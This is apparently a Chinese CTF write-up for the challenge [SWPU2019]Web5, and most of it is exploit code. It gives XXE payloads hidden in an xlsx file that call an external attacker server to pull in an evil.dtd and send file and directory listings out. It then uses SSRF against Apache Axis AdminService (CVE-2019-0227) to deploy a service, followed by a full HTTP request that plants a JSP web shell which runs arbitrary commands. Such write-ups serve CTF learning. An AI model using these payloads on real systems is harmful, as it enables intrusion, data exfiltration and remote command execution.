[SWPU2019]Web5
题目给了个导入导出通讯录的功能,导出为xlsx文件,所以猜测是解析excel引起的xxe
验证一下
对[Content_Types].xml写入poc之后再压缩回去
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANYTHING [
<!ENTITY % test SYSTEM "http://124.70.40.5:1234">
%test;
验证了xxe存在.无法直接读flag,利用java的file协议列目录,没回显的xxe。
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % fmyyy SYSTEM "http://124.70.40.5/evil.dtd">
%fmyyy;
]>
evil.dtd内容
<!ENTITY % file SYSTEM "file:ctffffff/backups">
<!ENTITY % dtd "<!ENTITY % xxe SYSTEM 'http://124.70.40.5:1234/?%file;'> ">
%dtd;
%xxe;
看到备份目录,下载。/ctffffff/backups/backup-af7f385c8840f173779124df915b6ebb.zip
读web.xml看到注册了FlagServlet,但没有权限读/flag
看到axis,查看其版本信息
该版本正好有个RCE
CVE-2019-0227
https://paper.seebug.org/1489/#141-rceservicehandler
这里的post请求包无法打通,因为这洞有前提条件,但xxe可以进行ssrf,尝试get的请求,用文章里第一个就行,路径得改成axis/shell.jsp
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % fmyyy SYSTEM "http://127.0.0.1:8080/axis/services/AdminService?method=!--%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22randomBBB%22%20provider%3D%22java%3ARPC%22%3E%3CrequestFlow%3E%3Chandler%20type%3D%22java%3Aorg.apache.axis.handlers.LogHandler%22%20%3E%3Cparameter%20name%3D%22LogHandler.fileName%22%20value%3D%22..%2Fwebapps%2Faxis%2Fshell.jsp%22%20%2F%3E%3Cparameter%20name%3D%22LogHandler.writeToConsole%22%20value%3D%22false%22%20%2F%3E%3C%2Fhandler%3E%3C%2FrequestFlow%3E%3Cparameter%20name%3D%22className%22%20value%3D%22java.util.Random%22%20%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22*%22%20%2F%3E%3C%2Fservice%3E%3C%2Fdeployment">
%fmyyy;
]>
访问看见服务成功开启
然后post /axis/services/randomBBB
(这里路径对应上面开启的服务名)
POST /axis/services/randomBBB HTTP/1.1
Host: 19d5d55d-6db4-4ac4-ab93-d0f1debc8c0f.node4.buuoj.cn:81
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/xml
SOAPAction: something
Content-Length: 874
Origin: http://19d5d55d-6db4-4ac4-ab93-d0f1debc8c0f.node4.buuoj.cn:81
Connection: close
Referer: http://19d5d55d-6db4-4ac4-ab93-d0f1debc8c0f.node4.buuoj.cn:81/axis/services/AdminService
Cookie: __gads=ID=df4db7075da356b3-22a4b6a235c800b4:T=1620812094:RT=1620812094:S=ALNI_MbStkXgvBJ8Ws8Umu-eWCgWwB0rTw; UM_distinctid=17cb52e2bac47c-0b11a0162b7f1d-455e6d-1fa400-17cb52e2bad4d8
Upgrade-Insecure-Requests: 1
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<api:main
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<api:in0><![CDATA[
<%@page import="java.util.*,java.io.*"%><% if (request.getParameter("c") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("c")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>
]]>
</api:in0>
</api:main>
</soapenv:Body>
</soapenv:Envelope>